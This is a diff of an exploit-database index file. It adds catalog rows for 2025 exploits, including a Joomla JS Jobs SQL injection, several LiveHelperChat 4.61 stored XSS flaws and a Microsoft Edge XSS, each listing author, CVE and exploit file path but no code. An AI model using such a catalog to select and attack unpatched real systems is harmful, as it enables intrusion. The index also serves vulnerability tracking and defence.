 52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,,
@@ -20949,6 +20953,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
 51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+52373,exploits/php/webapps/52373.txt,"Joomla JS Jobs plugin 1.4.2 - SQL injection",2025-07-22,"Adam Wallwork",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-49484,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@@ -23006,6 +23011,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
 43860,exploits/php/webapps/43860.txt,"LiveCRM SaaS Cloud 1.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5985,,,,,
 34721,exploits/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",webapps,php,,2014-09-20,2014-09-20,0,CVE-2014-6420;OSVDB-111744,,,,,
+52381,exploits/php/webapps/52381.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51403,,,,,
+52378,exploits/php/webapps/52378.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51398,,,,,
+52377,exploits/php/webapps/52377.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51397,,,,,
+52379,exploits/php/webapps/52379.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51400,,,,,
+52376,exploits/php/webapps/52376.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51396,,,,,
+52380,exploits/php/webapps/52380.txt,"LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function",2025-07-22,"Manojkumar J",webapps,php,,2025-07-22,2025-07-22,0,CVE-2025-51401,,,,,
 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
 23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",webapps,php,,2004-02-23,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9727/info
 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-18,0,,,,,,
@@ -44161,6 +44172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,remote,windows,,2007-08-09,,1,OSVDB-36399;CVE-2007-4336,,,,,
 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,,2017-01-05,2018-05-18,0,CVE-2016-7200;CVE-2016-7201,"Client Side",,,,https://github.com/theori-io/chakra-2016-11
 45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5
+52372,exploits/windows/remote/52372.txt,"Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)",2025-07-22,nu11secur1ty,remote,windows,,2025-07-22,2025-07-22,0,CVE-2015-6176,,,,,https://www.cve.org/CVERecord?id=CVE-2015-6176
 35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info
 28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info
 52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,,